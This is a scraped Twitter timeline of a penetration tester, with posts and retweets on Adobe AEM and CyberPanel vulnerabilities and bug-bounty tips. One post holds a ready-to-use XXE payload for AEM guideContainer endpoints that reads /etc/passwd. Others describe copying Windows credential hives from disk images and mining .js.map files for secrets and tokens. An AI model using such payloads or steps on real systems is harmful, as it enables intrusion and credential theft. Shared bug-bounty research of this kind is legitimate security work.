AEMSecurity

723 posts

AEMSecurity

AEMSecurity

@AEMSecurity

Husband + Father | Penetration Tester / Hacker | Interested in Security - Bugbounty - Vulnerability/Exploit Research CVE-2016-0956, CVE-2013-6674, CVE-2014-2018

United Arab Emirates, Dubai เข้าร่วม Eylül 2018
2K กำลังติดตาม9.5K ผู้ติดตาม
AEMSecurity รีทวีตแล้ว
sw33tLie
sw33tLie@sw33tLie·
This interview was super fun, and @InsiderPhD was an amazing host. Here's a picture of the trophy we won - together the crown from @Bugcrowd's bug boss challenge!
sw33tLie tweet media
Katie Paxton-Fear@InsiderPhD

New Video! I sit down and chat with @_godiego__, @sw33tLie and @bsysop about their recent event success and get their thoughts on collaborating with other hackers, how they all contribute to the success of their team, and get their advice for would be live hacking event teams

English
7
6
99
12.1K
AEMSecurity
AEMSecurity@AEMSecurity·
@elonmusk Since past 3 weeks I have constantly been flagging TEMU ads as "I dont like it" and even clicked "Report ad" but guess what? Still after every 5 posts, I have to repeat the same routine. Can we fix this?
English
0
0
3
146
AEMSecurity
AEMSecurity@AEMSecurity·
AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity
AEMSecurity tweet media
English
6
76
523
33.8K
AEMSecurity
AEMSecurity@AEMSecurity·
@ThisIsDK999 I didn't get into cloud based instances! Share some and let me check? ;)
English
1
0
1
273
AEMSecurity รีทวีตแล้ว
HotPlugin
HotPlugin@hotplugin0x01·
[+] Little Achievement Update! I've discovered a new security vulnerability, CVE-2024-54679, in CyberPanel (aka Cyber Panel), a widely-used web hosting control panel powered by OpenLiteSpeed. CVE Identifier: CVE-2024-54679 Advisory: nvd.nist.gov/vuln/detail/CV…
English
1
2
11
1.4K
AEMSecurity รีทวีตแล้ว
NXTL Solutions
NXTL Solutions@NXTLSolutions·
[+] CVE-2024-34070 NXTL Solutions offensive security team is dedicated to securing cyberspace with advanced vulnerability research. Recently dicovered a critical Blind XSS vulnerability > Froxlor leading to potential app compromise. #Bugbountytips #NXTLSolutions #bugbountytip
NXTL Solutions tweet media
English
1
5
11
1.6K
AEMSecurity
AEMSecurity@AEMSecurity·
[+] #BugbountyTip Take your time, Do Not Rush! Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips
AEMSecurity tweet media
English
2
13
162
14.2K
AEMSecurity
AEMSecurity@AEMSecurity·
You can use the above payload by sending an HTTP POST request to guideContainer endpoints while hunting on Adobe AEM for bugs! #Bugbountytips #bugbounty
English
0
0
15
2.1K
AEMSecurity รีทวีตแล้ว
NXTL Solutions
NXTL Solutions@NXTLSolutions·
Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity
NXTL Solutions tweet media
English
1
2
8
944
AEMSecurity รีทวีตแล้ว
nyxgeek
nyxgeek@nyxgeek·
Did you know that 7z can browse .VHD and .VMDK files? You can open them right up, and even directly browse ntfs filesystems. On a pentest and find a bunch of disk images? Copy the SAM/SECURITY/SYSTEM hives directly from the images, no mounting, copying, or fussing around.
nyxgeek tweet medianyxgeek tweet media
English
61
421
2.6K
186.3K
AEMSecurity
AEMSecurity@AEMSecurity·
Writeup and POC
English
0
0
0
557
AEMSecurity
AEMSecurity@AEMSecurity·
A 0-click pre-auth RCE (root) exploit for LiteSpeed CyberPanel was released on 27th October and is being actively exploited. If anyone is still using version 2.3.6? immediately upgrade it to the latest version 2.3.7! #AEMSecurity #0day #Security
AEMSecurity tweet media
English
1
15
105
6.9K
AEMSecurity รีทวีตแล้ว
jp / kw0
jp / kw0@JoshuaProvoste·
This report was completely unexpected for me! 😇 1. Bypass the login.microsoftonline.com gateway 2. Inspect *.js files and append *.js.map extension 4. Dump *.js.map files to find secrets or endpoints 5. Abuse the token in API request #bugbounty #bugbountytips #bugbountytip
jp / kw0 tweet media
English
9
25
203
12.2K